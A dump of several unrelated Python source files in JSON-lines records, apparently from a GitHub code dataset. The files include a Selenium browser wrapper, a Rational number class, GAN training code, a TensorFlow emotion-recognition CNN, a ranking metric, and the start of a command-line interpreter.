举例:切换到id为mainFrame的frame中\n driver.switch_to_frame(\"id=mainFrame\")\n \"\"\"\n self.driver.switch_to.frame(self.find_element(element))\n\n def switch_to_frame_out(self):\n \"\"\"\n 这是switch_to中独有的方法,可以切换到上一层的frame,对于层层嵌套的frame很有用。\n\n 举例:\n driver.switch_to_frame_out()\n \"\"\"\n self.driver.switch_to.parent_frame()\n\n def switch_to_default(self):\n \"\"\"\n 切换到最上层页面。\n\n 举例:\n driver.switch_to_default()\n \"\"\"\n self.driver.switch_to.default_content()\n\n def open_new_window(self):\n \"\"\"\n 打开新窗口并切换到新打开的窗口。\n\n 举例:\n driver.open_new_window()\n \"\"\"\n current_windows = self.driver.current_window_handle\n all_handles = self.driver.window_handles\n for handle in all_handles:\n if handle != current_windows:\n self.driver.switch_to.window(handle)\n\n def F5(self):\n \"\"\"\n 刷新当前页面\n\n 举例:\n driver.F5()\n \"\"\"\n self.driver.refresh()\n\n def js(self, script):\n \"\"\"\n 执行JavaScript脚本。\n\n 举例:执行js���动到指定坐标\n driver.js(\"window.scrollTo(200,1000);\")\n \"\"\"\n self.driver.execute_script(script)\n\n def accept_alert(self):\n \"\"\"\n 点击警告框。\n\n 举例:\n driver.accept_alert()\n \"\"\"\n self.driver.switch_to.alert.accept()\n\n def dismiss_alert(self):\n \"\"\"\n 解除可用警报。\n\n 举例:\n driver.dismiss_alert()\n \"\"\"\n self.driver.switch_to.alert.dismiss()\n\n def close(self):\n \"\"\"\n 关闭当前页面\n 举例:\n driver.close()\n \"\"\"\n self.driver.close()\n\n def quit(self):\n \"\"\"\n 关闭所有页面\n\n 举例:\n driver.quit()\n \"\"\"\n self.driver.delete_all_cookies()\n self.driver.quit()\n\n\nif __name__ == '__main__':\n # from BlueRose import BlueRose\n # driver = BlueRose(\"chrome\") # 调用浏览器,支持 'firefox', 'chrome', 'ie' or 'phantomjs'\n driver = BlueRose(browser=\"chrome\")\n driver.get(\"http://www.baidu.com\")\n driver.max_window() # 浏览器最大化\n driver.send_keys(\"id=kw\", \"selenium\") # 该元素位置输入内容\n time.sleep(2)\n driver.click(\"id=su\")\n time.sleep(2)\n driver.click(\"id=result_logo\") # 点击元素\n time.sleep(2)\n driver.F5() # 刷新页面\n driver.get_screenshot() # 截图\n time.sleep(2)\n driver.back() # 后退\n time.sleep(2)\n driver.forward() # 前进\n driver.close()\n","repo_name":"yzxwp/practice","sub_path":"UI_framework/framework.py","file_name":"framework.py","file_ext":"py","file_size_in_byte":17170,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"30319515650","text":"'''\nProgram: Rational.py\nAuthor: Eric Gimbel\nDate: 2/9/22\n\nAn ADT implementaion of a rational (real) number.\nDemonstrates operator overloading\n'''\n\nimport math\n\n\nclass Rational: # I removed object/parenthesis as this is not needed in python 3 unless you have a parent class or for backward compatibility.\n def __init__(self, num = 0, den = 1):\n '''pre: creates a new Rational object, num and den are integers\n post: creates the Rational object num / den, and returns num and den in reduced form\n '''\n # Gcd from math module to find greatest common divisor.\n # That number is then taken and divided into the numerator and denominator, \n # resulting in a reduced fraction.\n greatestCommon = math.gcd(num,den)\n self.num = int(num / greatestCommon)\n self.den = int(den / greatestCommon) # type casted int as the gcd returns float values and made unit tests harder to do. \n \n def __mul__(self, other):\n '''* operator\n pre: self and other are Rational objects\n post: returns Rational product: self * other\n '''\n\n num = self.num * other.num\n den = self.den * other.den\n return Rational(num, den)\n \n def __str__(self):\n '''return string for printing\n pre: self is Rational object\n post: returns a string representation self\n ''' \n return str(self.num) + '/' + str(self.den) \n\n def __add__(self, other):\n '''+ operator\n pre: self and other are Rational objects\n post: returns added fractions in reduced form\n '''\n # Apply cross multiplication of fractions. I had to teach myself this as it was a different way than I learned! But works better. \n # Order of operations is important here to note when trying to add on your own! \n # This also avoids trying to set up an alternate method of adding fractions with same denominator! \n n = self.num * other.den + self.den * other.num \n d = self.den * other.den\n \n return Rational(n,d) \n \n def __sub__(self, other):\n '''- operator\n pre: self and other are Rational objects\n post: returns subtracted fractions in reduced form\n '''\n # Again apply cross multiplication this time subtracting.\n num = self.num * other.den - self.den * other.num\n den = self.den * other.den\n \n return Rational(num,den)\n\n def __truediv__(self, other):\n '''/ operator\n pre: self and other are Rational objects\n post: returns true division of integers in reduced form\n '''\n # The reciprocal needs to be flipped before multiplying, cross multiply!\n num = self.num * other.den\n den = self.den * other.num\n \n return Rational(num,den) \n\n def __lt__(self, other):\n '''< operator\n pre: self and other are Rational objects\n post: returns True if first (left) fraction is less than second (right) fraction,\n returns False if opposite is true\n '''\n num = self.num * other.den\n den = other.num * self.den\n \n if num < den:\n return True\n else:\n return False \n\n def __gt__(self, other):\n '''> operator\n pre: self and other are Rational objects\n post: returns True if first (left) fraction is greater than second (right) fraction,\n return False if opposite is true\n '''\n num = self.num * other.den\n den = other.num * self.den\n \n if num > den:\n return True\n else:\n return False\n\n def __le__(self, other):\n '''<= operator\n pre: self and other are Rational objects\n post: returns True if first (left) fraction is less than or equal to second (right) fraction,\n returns False if opposite is true\n '''\n num = self.num * other.den\n den = other.num * self.den\n \n if num <= den:\n return True\n else:\n return False\n\n def __ge__(self, other):\n '''>= operator\n pre: self and other are Rational objects\n post: returns True if first (left) fraction is greater than or equal to second (right) fraction,\n returns False if opposite is true\n '''\n num = self.num * other.den\n den = other.num * self.den\n \n if num >= den:\n return True\n else:\n return False\n\n def __eq__(self, other):\n '''== operator\n pre: self and other are Rational objects\n post: returns True if first (left) fraction is equal to second (right) fraction,\n returns False if fractions are not equal\n '''\n num = self.num * other.den\n den = other.num * self.den\n \n if num == den:\n return True\n else:\n return False\n \n def __ne__(self, other):\n '''!= operator\n pre: self and other are Rational objects\n post: returns True if first (left) fraction is not equal to second (right) fraction,\n returns False if fractions are equal\n '''\n num = self.num * other.den\n den = other.num * self.den\n \n if num != den:\n return True\n else:\n return False\n \n# Sources: As your aware I did look at code that was on github. But oddly enough did not use \n# the solutions. None of the code I viewed had the unit tests. And the code I did look at was simply\n# to try and understand the differences of instance variables and local within classes. I did read about classes\n# in two books I have, which are \"Python Crash Course\" and \"Think Python.\" I read quite a bit from our\n# book and watched parts of your lecture which helped immensely. The biggest issue I had was figuring out\n# the addition method. My problem was simple math and not realizing the different ways to add/subtract fractions.\n# One thing I didn't use was my own gcd, instead I used the math module. The code I did view on github had a version\n# of Euclid's algorithm but I felt it wouldn't be my own, and I need to understand it before using it in my code.\n# https://github.com/zeelorenc/python-fraction-class/blob/master/fraction.py\n# https://byjus.com/maths/greatest-common-divisor/\n# https://prepinsta.com/python-program/addition-of-two-fractions/\n# https://www.mometrix.com/academy/cross-multiplying-fractions/\n# https://pythontutor.com\n# Then a ton of googling. I want to try and come up with my own gcd. Which I will continue to work on. I was able to complete the first\n# assignment with the program returning none and checking for negative numbers. These are incredible learning assignments, I do get\n# pretty frustated because I am not a math person but it is also logic as well and being able to translate things into code.\n# This assignment definately helped! In addition to running the unit tests with the values present, I also used my class to test each method\n# of code. Hopefully, everything works and I was able to properly complete the pre and post conditions.\n# testone = Rational(3,6)\n# testtwo = Rational(4,12)\n# testResult = testone + testtwo\n# print(testResult)\n# OOP is indeed awesome! (Update) Didn't completely understand the power behind classes and methods,\n# but once I tested with the code above, it really hit home how useful ADT's and OOP is!\n# Here is the GCD or Euclid's algorithm:\n#def __gcd__(a,b):\n# if b == 0: (Could also use: while b != 0: return a else: return(b, a%b)\n# return a\n# else:\n# return(b, a%b)\n\n# It solves it by taking the larger number if \"b\" isn't 0, and switching them then modulus which\n# gives the remainder and via recursion continues until \"b\" is 0 then returns \"a\" which is the GCD.\n# Although, I understand this now, I was not comfortable using it and couldn't figure out where to put\n# it in my code.\n","repo_name":"sechvn/cybersec","sub_path":"Rational_secondp/Rational.py","file_name":"Rational.py","file_ext":"py","file_size_in_byte":8147,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"30749396624","text":"import functools\nfrom typing import Any, Dict, Sequence, Tuple, Union, Optional, List # pylint: disable=unused-import\nfrom absl import logging\n\nfrom clu import metrics\n\nimport flax\nimport flax.linen as nn\nimport jax\nimport jax.numpy as jnp\nimport ml_collections\nimport numpy as np\n\nfrom xmcgan.libml import attention_lib as attn_lib # pylint: disable=unused-import\nfrom xmcgan.libml import losses\nfrom xmcgan.utils import pretrained_model_utils\n\n\n@flax.struct.dataclass\nclass TrainMetrics(metrics.Collection):\n\n d_loss: metrics.Average.from_output(\"d_loss\")\n g_loss: metrics.Average.from_output(\"g_loss\")\n c_loss_d: metrics.Average.from_output(\"c_loss_d\")\n c_loss_g: metrics.Average.from_output(\"c_loss_g\")\n c_loss_g_pretrained: metrics.Average.from_output(\"c_loss_g_pretrained\")\n\n\ndef create_additional_data(config: ml_collections.ConfigDict):\n \"\"\"Returns additional data required to run the model.\"\"\"\n image_model = None\n image_model_state = None\n additional_data = {}\n if config.pretrained_image_contrastive:\n (image_model,\n image_model_state) = pretrained_model_utils.get_pretrained_model()\n additional_data.update({\n \"image_model\": image_model,\n \"image_model_state\": image_model_state,\n })\n return additional_data\n\n\ndef calculate_contrastive_loss(result_dict):\n \"\"\"Calculates contrastive loss.\n\n Args:\n result_dict: Dictionary output from the discriminator.\n Returns:\n c_loss_d: Contrastive loss for the discriminator.\n c_loss_g: Contrastive loss for the generator.\n \"\"\"\n real_loss = result_dict[\"real_word_loss\"] + result_dict[\"real_sentence_loss\"]\n fake_loss = result_dict[\"fake_word_loss\"] + result_dict[\"fake_sentence_loss\"]\n c_loss_d = real_loss\n c_loss_g = fake_loss + result_dict[\"image_contrastive_loss\"]\n return c_loss_d, c_loss_g\n\n\ndef calculate_contrastive_loss_on_pretrained(model: nn.Module, state: Any,\n real_images: jnp.ndarray,\n fake_images: jnp.ndarray):\n \"\"\"Calculates contrastive loss on pre-trained model.\n\n Args:\n model: Pretrained model used for computing features.\n state: TrainState object at current training step.\n real_images: Array of real images.\n fake_images: Array of generated images.\n \"\"\"\n _, real_outputs = pretrained_model_utils.get_pretrained_embs(\n state, model, images=real_images)\n _, fake_outputs = pretrained_model_utils.get_pretrained_embs(\n state, model, images=fake_images)\n loss, _, _ = attn_lib.contrastive_loss(real_outputs, fake_outputs)\n return loss\n\n\ndef train_g_d(\n rng: np.ndarray,\n state: Any,\n batch: Dict[str, jnp.ndarray],\n generator: Union[nn.Module, functools.partial],\n discriminator: Union[nn.Module, functools.partial],\n config: ml_collections.ConfigDict,\n additional_data: Dict[str, Any]) -> Tuple[Any, metrics.Collection]:\n \"\"\"Perform a single training step.\n\n Args:\n rng: The random seed,\n state: State of the model (optimizer and state).\n batch: Training inputs for this step.\n generator: Flax module for the generator. The apply method must take input\n images and a boolean argument indicating whether to use training or\n inference mode.\n discriminator: Flax module for the discriminator. The apply method must take\n input images and a boolean argument indicating whether to use training or\n inference mode.\n config: Configuration for model.\n additional_data: Dictionary containing model specific data / networks.\n\n Returns:\n The new model state and dictionary with metrics\n \"\"\"\n logging.info(\"train_step(batch=%s)\", batch)\n\n step = state.step + 1\n if config.dtype == \"bfloat16\":\n dtype = jnp.bfloat16\n else:\n dtype = jnp.float32\n\n def loss_fn(params_d, params_g):\n g_variables = {\"params\": params_g}\n g_variables.update(state.generator_state)\n d_variables = {\"params\": params_d}\n d_variables.update(state.discriminator_state)\n if \"z\" in batch:\n z = batch[\"z\"]\n else:\n z = jax.random.normal(\n rng, (batch[\"image\"].shape[0], config.z_dim), dtype=dtype)\n real_image = batch[\"image\"]\n generated_image, new_g_variables = generator(train=True).apply(\n g_variables, (batch, z), mutable=[\"batch_stats\", \"spectral_norm_stats\"])\n all_images = jnp.concatenate([real_image, generated_image])\n (logit, result_dict), new_d_variables = discriminator(train=True).apply(\n d_variables, (all_images, batch),\n mutable=[\"batch_stats\", \"spectral_norm_stats\"])\n logit = jnp.asarray(logit, jnp.float32)\n real_logit, fake_logit = jnp.split(logit, 2)\n d_loss, g_loss = losses.hinge_loss(real_logit, fake_logit)\n c_loss_d, c_loss_g = calculate_contrastive_loss(result_dict)\n c_loss_g_pretrained = 0.0\n if config.pretrained_image_contrastive:\n c_loss_g_pretrained = calculate_contrastive_loss_on_pretrained(\n additional_data[\"image_model\"], additional_data[\"image_model_state\"],\n real_image, generated_image)\n d_loss = d_loss + c_loss_d\n g_loss = g_loss + c_loss_g + c_loss_g_pretrained\n new_g_state = dict(new_g_variables)\n new_d_state = dict(new_d_variables)\n return (d_loss, g_loss), (new_g_state, new_d_state, c_loss_d, c_loss_g,\n c_loss_g_pretrained)\n\n params_d = state.d_optimizer.target\n params_g = state.g_optimizer.target\n (d_loss, g_loss), func_vjp, (new_g_state, new_d_state, c_loss_d, c_loss_g,\n c_loss_g_pretrained) = jax.vjp(\n loss_fn, params_d, params_g, has_aux=True)\n\n d_grad, _ = func_vjp((1., 0.))\n _, g_grad = func_vjp((0., 1.))\n\n # Compute average gradient across multiple workers.\n d_grad = jax.lax.pmean(d_grad, axis_name=\"batch\")\n g_grad = jax.lax.pmean(g_grad, axis_name=\"batch\")\n new_d_optimizer = state.d_optimizer.apply_gradient(d_grad)\n new_g_optimizer = state.g_optimizer.apply_gradient(g_grad)\n ema_decay = config.polyak_decay\n new_ema_params = jax.tree_multimap(\n lambda ema, p: ema * ema_decay + (1 - ema_decay) * p, state.ema_params,\n new_g_optimizer.target)\n new_state = state.replace( # pytype: disable=attribute-error\n step=step,\n d_optimizer=new_d_optimizer,\n g_optimizer=new_g_optimizer,\n generator_state=new_g_state,\n discriminator_state=new_d_state,\n ema_params=new_ema_params)\n metrics_update = TrainMetrics.gather_from_model_output(\n g_loss=g_loss,\n d_loss=d_loss,\n c_loss_d=c_loss_d,\n c_loss_g=c_loss_g,\n c_loss_g_pretrained=c_loss_g_pretrained)\n return new_state, metrics_update\n\n\ndef train_d(rng: np.ndarray, state: Any, batch: Dict[str, jnp.ndarray],\n generator: Union[nn.Module, functools.partial],\n discriminator: Union[nn.Module, functools.partial],\n config: ml_collections.ConfigDict) -> Any:\n \"\"\"Perform a single training step.\n\n Args:\n rng: The random seed,\n state: State of the model (optimizer and state).\n batch: Training inputs for this step.\n generator: Flax module for the generator. The apply method must take input\n images and a boolean argument indicating whether to use training or\n inference mode.\n discriminator: Flax module for the discriminator. The apply method must take\n input images and a boolean argument indicating whether to use training or\n inference mode.\n config: Configuration for model.\n\n Returns:\n The new model state.\n \"\"\"\n if config.dtype == \"bfloat16\":\n dtype = jnp.bfloat16\n else:\n dtype = jnp.float32\n\n def loss_fn(params_d, params_g):\n g_variables = {\"params\": params_g}\n g_variables.update(state.generator_state)\n d_variables = {\"params\": params_d}\n d_variables.update(state.discriminator_state)\n if \"z\" in batch:\n z = batch[\"z\"]\n else:\n z = jax.random.normal(\n rng, (batch[\"image\"].shape[0], config.z_dim), dtype=dtype)\n\n generated_image, _ = generator(train=True).apply(\n g_variables, (batch, z), mutable=[\"batch_stats\", \"spectral_norm_stats\"])\n all_images = jnp.concatenate([batch[\"image\"], generated_image])\n (logit, result_dict), new_d_variables = discriminator(train=True).apply(\n d_variables, (all_images, batch),\n mutable=[\"batch_stats\", \"spectral_norm_stats\"])\n logit = jnp.asarray(logit, jnp.float32)\n real_logit, fake_logit = jnp.split(logit, 2)\n d_loss, _ = losses.hinge_loss(real_logit, fake_logit)\n c_loss_d, _ = calculate_contrastive_loss(result_dict)\n d_loss += c_loss_d\n new_d_state = dict(new_d_variables)\n return d_loss, new_d_state\n\n params_d = state.d_optimizer.target\n params_g = state.g_optimizer.target\n grad_fn = jax.value_and_grad(loss_fn, has_aux=True)\n (d_loss, new_d_state), d_grad = grad_fn(params_d, params_g)\n del d_loss\n # Compute average gradient across multiple workers.\n d_grad = jax.lax.pmean(d_grad, axis_name=\"batch\")\n new_d_optimizer = state.d_optimizer.apply_gradient(d_grad)\n new_state = state.replace( # pytype: disable=attribute-error\n d_optimizer=new_d_optimizer,\n discriminator_state=new_d_state)\n return new_state\n","repo_name":"google-research/xmcgan_image_generation","sub_path":"xmcgan/xmc_gan.py","file_name":"xmc_gan.py","file_ext":"py","file_size_in_byte":9143,"program_lang":"python","lang":"en","doc_type":"code","stars":98,"dataset":"github-code","pt":"48"} +{"seq_id":"817112806","text":"import setuptools\n\nwith open(\"README.md\", \"r\", encoding=\"utf-8\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"chainedcache\", # Replace with your own username\n version=\"0.0.1\",\n author=\"Janos Tolgyesi\",\n author_email=\"janos.tolgyesi@gmail.com\",\n description=\"A simple cache in python\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/mrtj/chainedcache\",\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n packages=setuptools.find_packages(),\n python_requires='>=3.6',\n)\n","repo_name":"mrtj/chainedcache","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"914789400","text":"import tensorflow as tf\n\nINPUT_NODE = 2304\nOUTPUT_NODE = 7\n\nIMAGE_SIZE = 48\nNUM_CHANNELS = 3\nNUM_LABELS = 10\n\nKEEP_PROP = 0.3\n\nKEEP_PROP_NEXT = 0.3\n\n# 定义卷积网络的前向传播过程。\n# input_tensor : 输入训练数据\n# train : 标记为训练过程还是测试过程,若为训练过程,需要进行dropout\ndef inference(input_tensor, train):\n # 第一个卷积层,包括一个核大小5*5,步长为1,SAME模式的卷积核\n # 激励函数为relu\n # 输入为48 * 48 * 1\n # 输出为48 * 48 * 32\n with tf.variable_scope('layer1-conv1'):\n layer1_weight = tf.get_variable(\n \"weight\", [5,5,1,32], initializer=tf.truncated_normal_initializer(stddev=0.1)\n )\n layer1_bias = tf.get_variable(\n \"bias\", [32], initializer=tf.constant_initializer(0.1))\n layer1_conv = tf.nn.conv2d(\n input_tensor, layer1_weight, strides=[1,1,1,1], padding='SAME')\n layer1_relu = tf.nn.relu(tf.nn.bias_add(layer1_conv, layer1_bias))\n\n print('第一个卷积层输出size', layer1_relu.get_shape().as_list())\n\n # 第一个池化层,大小为3*3,步长为2, SAME\n # 输出为24 * 24 * 32\n with tf.variable_scope('layer2-pool1'):\n layer2_pool = tf.nn.max_pool(layer1_relu, ksize=[1,3,3,1], strides=[1,2,2,1], padding='SAME')\n\n print('第一个池化层输出size', layer2_pool.get_shape().as_list())\n\n # 第二个卷积层\n # 激励函数为relu\n # 输出为24 * 24 * 32\n with tf.variable_scope('layer3-conv2'):\n layer3_weight = tf.get_variable(\n \"weight\", [4, 4, 32, 32], initializer=tf.truncated_normal_initializer(stddev=0.1)\n )\n layer3_bias = tf.get_variable(\n \"bias\", [32], initializer=tf.constant_initializer(0.1))\n layer3_conv = tf.nn.conv2d(\n layer2_pool, layer3_weight, strides=[1, 1, 1, 1], padding='SAME')\n layer3_relu = tf.nn.relu(tf.nn.bias_add(layer3_conv, layer3_bias))\n\n print('第二个卷积层输出size', layer3_relu.get_shape().as_list())\n\n # 第二个池化层\n # 输出为12 * 12 * 32\n with tf.variable_scope('layer4-pool2'):\n layer4_pool = tf.nn.max_pool(layer3_relu, ksize=[1,3,3,1], strides=[1,2,2,1], padding='SAME')\n\n print('第二个池化层输出size', layer4_pool.get_shape().as_list())\n\n # 第三个卷积层\n # 激励函数为relu\n # 输出为12 * 12 * 64\n with tf.variable_scope('layer5-conv3'):\n layer5_weight = tf.get_variable(\n \"weight\", [5, 5, 32, 64], initializer=tf.truncated_normal_initializer(stddev=0.1)\n )\n layer5_bias = tf.get_variable(\n \"bias\", [64], initializer=tf.constant_initializer(0.1))\n layer5_conv = tf.nn.conv2d(\n layer4_pool, layer5_weight, strides=[1, 1, 1, 1], padding='SAME')\n layer5_relu = tf.nn.relu(tf.nn.bias_add(layer5_conv, layer5_bias))\n\n print('第三个卷积层输出size', layer5_relu.get_shape().as_list())\n\n # 第三个池化层\n # 输出为6 * 6 * 64\n with tf.variable_scope('layer6-pool3'):\n layer6_pool = tf.nn.max_pool(layer5_relu, ksize=[1,3,3,1], strides=[1,2,2,1], padding='SAME')\n\n print('第三个池化层输出size', layer6_pool.get_shape().as_list())\n\n # 将各层展平,进入全连接层\n # 这里应该变为1 * 36 * 64\n # pool_shape = layer6_pool.get_shape().as_list()\n # nodes = pool_shape[1] * pool_shape[2] * pool_shape[3]\n # reshaped = tf.reshape(layer6_pool, [pool_shape[0], nodes])\n reshaped = tf.reshape(layer6_pool, [-1, 2304])\n\n # 第一个全连接层\n # 输出为1 * 1 * 2048\n with tf.variable_scope('layer7-fc1'):\n layer7_weight = tf.get_variable(\n \"weight\", [2304, 2048], initializer=tf.truncated_normal_initializer(stddev=0.1))\n layer7_bias = tf.get_variable(\"bias\", [2048], initializer=tf.constant_initializer(0.1))\n layer7_fc = tf.nn.relu(tf.matmul(reshaped, layer7_weight) + layer7_bias)\n if train :\n layer7_fc = tf.nn.dropout(layer7_fc, KEEP_PROP, name='layer7')\n\n # 第二个全连接层\n # 输出为1 * 1 * 1024\n with tf.variable_scope('layer8-fc2'):\n layer8_weight = tf.get_variable(\n \"weight\", [2048, 1024], initializer=tf.truncated_normal_initializer(stddev=0.1))\n layer8_bias = tf.get_variable(\"bias\", [1024], initializer=tf.constant_initializer(0.1))\n layer8_fc = tf.nn.relu(tf.matmul(layer7_fc, layer8_weight) + layer8_bias)\n if train:\n layer8_fc = tf.nn.dropout(layer8_fc, KEEP_PROP_NEXT, name='dropout')\n\n # 第三个全连接层\n # 输出为1 * 1 * 7\n with tf.variable_scope('layer9-fc3'):\n layer9_weight = tf.get_variable(\n \"weight\", [1024, 7], initializer=tf.truncated_normal_initializer(stddev=0.1))\n layer9_bias = tf.get_variable(\"bias\", [7], initializer=tf.constant_initializer(0.1))\n logit = tf.matmul(layer8_fc, layer9_weight, name='logits') + layer9_bias\n return logit\n\n\n\n\n\n","repo_name":"XingToMax/FaceEmotionalRecognition","sub_path":"inference/main_inference.py","file_name":"main_inference.py","file_ext":"py","file_size_in_byte":4985,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"48"} +{"seq_id":"42699810245","text":"\"\"\"\nHitrate metric:\n * :func:`hitrate`\n\"\"\"\nimport torch\n\n\ndef hitrate(\n outputs: torch.Tensor, targets: torch.Tensor, k=10\n) -> torch.Tensor:\n \"\"\"\n Calculate the hit rate score given model outputs and targets.\n Hit-rate is a metric for evaluating ranking systems.\n Generate top-N recommendations and if one of the recommendation is\n actually what user has rated, you consider that a hit.\n By rate we mean any explicit form of user's interactions.\n Add up all of the hits for all users and then divide by number of users\n\n Compute top-N recomendation for each user in the training stage\n and intentionally remove one of this items fro the training data.\n\n Args:\n outputs (torch.Tensor):\n Tensor weith predicted score\n size: [batch_size, slate_length]\n model outputs, logits\n targets (torch.Tensor):\n Binary tensor with ground truth.\n 1 means the item is relevant\n for the user and 0 not relevant\n size: [batch_szie, slate_length]\n ground truth, labels\n k (int):\n Parameter fro evaluation on top-k items\n\n Returns:\n hitrate (torch.Tensor): the hit rate score\n \"\"\"\n k = min(outputs.size(1), k)\n\n _, indices_for_sort = outputs.sort(descending=True, dim=-1)\n true_sorted_by_preds = torch.gather(\n targets, dim=-1, index=indices_for_sort\n )\n true_sorted_by_pred_shrink = true_sorted_by_preds[:, :k]\n hits = torch.sum(true_sorted_by_pred_shrink, dim=1) / k\n return hits\n\n\n__all__ = [\"hitrate\"]\n","repo_name":"hakanaku1234/catalyst-1","sub_path":"catalyst/metrics/hitrate.py","file_name":"hitrate.py","file_ext":"py","file_size_in_byte":1584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"40667967313","text":"from os import path\nimport json\nfrom Utils.Structures import Node \nfrom Utils import Constants\nimport numpy as np\nimport copy\nimport treelstm\nimport torch\n\n\n# max number of ASTs and Commits \nN_ASTS = 1\nN_COMMITS = 10\nN_PRDESC = Constants.MAX_LEN\n\ndefault_ast = {\n 'nodes': [[-1, -1], [-1, -1]],\n 'edges': [[0,1]]\n}\n\ndefault_commit = {\n 'cm': [1],\n 'comments': [1],\n 'old_asts': [default_ast]*N_ASTS,\n 'cur_asts': [default_ast]*N_ASTS\n}\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\ndef adjust_asts(asts: list):\n\n n = len(asts)\n\n if n < N_ASTS:\n asts.extend([default_ast]*(N_ASTS - n))\n elif n > N_ASTS:\n asts = asts[:N_ASTS]\n\n return asts\n\ndef adjust_commits(commits: dict):\n\n n = len(commits)\n\n if n < N_COMMITS:\n for i in range(1, N_COMMITS-n+1):\n commits[f'key{i}'] = copy.deepcopy(default_commit)\n elif n > N_COMMITS:\n keys = list(commits.keys())\n keys = keys[N_COMMITS:]\n for k in keys:\n del commits[k]\n\n return commits\n\ndef adjust_body(body: list):\n \n '''Fixes the size of body'''\n if len(body) >= N_PRDESC:\n body = body[:N_PRDESC-1] + [2]\n elif len(body) < N_PRDESC:\n body.append(2)\n body.extend([1]*(N_PRDESC - len(body)))\n\n return body\n\n\ndef _build_tree(node, adj):\n\n for child_id in adj[str(node.id)]['children']:\n \n child = Node(child_id, adj[str(child_id)]['label'])\n node.children.append(child)\n _build_tree(child, adj)\n \n\ndef build_tree(adj):\n\n if len(adj) == 0:\n # adj = {}\n return Node(0, 1) # 0 -> id, 1 -> _BLANK\n \n root_id = list(adj.keys())[0]\n root = Node(root_id, adj[root_id]['label'])\n _build_tree(root, adj)\n\n return root\n\ndef convert_tree_to_tensors(tree):\n\n node_order, edge_order = treelstm.calculate_evaluation_orders(tree['edges'], len(tree['nodes']))\n\n return {\n 'features': torch.tensor(tree['nodes'], device=device, dtype=torch.float32),\n 'adjacency_list': torch.tensor(tree['edges'], device=device, dtype=torch.int64),\n 'node_order': torch.tensor(node_order, device=device, dtype=torch.int64),\n 'edge_order': torch.tensor(edge_order, device=device, dtype=torch.int64)\n }\n\n\n\n'''\nLoads the dataset from json file to memory.\nConverts lists of numbers to numpy arrays.\nAdjust the number of ASTs and Commits.\nBuilds the tree using the Node data structure.\n'''\ndef load_data(file_path):\n\n with open(file_path) as f:\n dataset = json.load(f)\n \n for key in dataset:\n dataset[key]['body'] = np.array(adjust_body(dataset[key]['body']))\n dataset[key]['issue_title'] = np.array(dataset[key]['issue_title'] if len(dataset[key]['issue_title']) > 0 else [1])\n\n commits = dataset[key]['commits']\n commits = adjust_commits(commits)\n\n for commit_sha in commits:\n\n commits[commit_sha]['cm'] = np.array(commits[commit_sha]['cm'] if len(commits[commit_sha]['cm']) > 0 else [1])\n commits[commit_sha]['comments'] = np.array(commits[commit_sha]['comments'] if len(commits[commit_sha]['comments']) > 0 else [1])\n\n old_asts = dataset[key]['commits'][commit_sha]['old_asts']\n old_asts = adjust_asts(old_asts)\n # dataset[key]['commits'][commit_sha]['old_asts'] = [build_tree(x) for x in old_asts]\n dataset[key]['commits'][commit_sha]['old_asts'] = [convert_tree_to_tensors(x) for x in old_asts]\n\n cur_asts = dataset[key]['commits'][commit_sha]['cur_asts']\n cur_asts = adjust_asts(cur_asts)\n # dataset[key]['commits'][commit_sha]['cur_asts'] = [build_tree(x) for x in cur_asts]\n dataset[key]['commits'][commit_sha]['cur_asts'] = [convert_tree_to_tensors(x) for x in cur_asts]\n \n dataset[key]['commits'] = commits\n\n return dataset\n \n\n\nif __name__ =='__main__':\n\n data = load_data('../Data/sample_dataset_proc.json')\n root = data['elastic/elasticsearch_37964']['commits'][\"'df18d6b7d9d2236d1512f7476301ecda15b20401'\"]['old_asts'][0]\n\n def find_height(root):\n\n if len(root.children) == 0:\n return 1\n \n h_max = 0\n\n for child in root.children:\n h_max = max(h_max, find_height(child))\n \n return h_max + 1\n\n print(find_height(root))","repo_name":"AnuraagReddy123/CodeSummarization","sub_path":"Model_Pytorch/load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":4363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17245844106","text":"from Projectile import Projectile\r\nimport matplotlib.pyplot as plt\r\n\r\n#uzet je a tako da je promjer kugle jednak bridu kocke radi usporedbe gibanja\r\nkugla = Projectile(10, 0.5, 'kugla')\r\nkocka = Projectile(10, 1, 'kocka')\r\n\r\nkugla.kosiHitac_Euler(0, 10, 45, 0.01, 10, 1)\r\nkocka.kosiHitac_Euler(0, 10, 45, 0.01, 10, 1)\r\n\r\nplt.plot(kugla.x, kugla.y, label='kugla')\r\nplt.plot(kocka.x, kocka.y, label='kocka')\r\nplt.xlabel('x/m')\r\nplt.ylabel('y/m')\r\n\r\nplt.legend()\r\nplt.show()\r\n\r\n\r\n","repo_name":"anacavar/PAF","sub_path":"Domaci/Domaci_4/program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13144809837","text":"#!/usr/bin/python3\n\"\"\"\nThis module provides a python command line interpreter\n\"\"\"\nimport cmd\nimport sys\nimport shlex\nimport re\nfrom models.base_model import BaseModel\nfrom models.user import User\nfrom models.state import State\nfrom models.city import City\nfrom models.amenity import Amenity\nfrom models.place import Place\nfrom models.review import Review\nfrom models import storage\n\n\nclass HBNBCommand(cmd.Cmd):\n \"\"\"Provides methods that ensure proper functioning of\n the interpreter\n \"\"\"\n prompt = \"(hbnb) \"\n all_classes = [\n \"BaseModel\",\n \"User\",\n \"State\",\n \"City\",\n \"Amenity\",\n \"Place\",\n \"Review\"\n ]\n\n def precmd(self, line):\n \"\"\"Split the input into command and 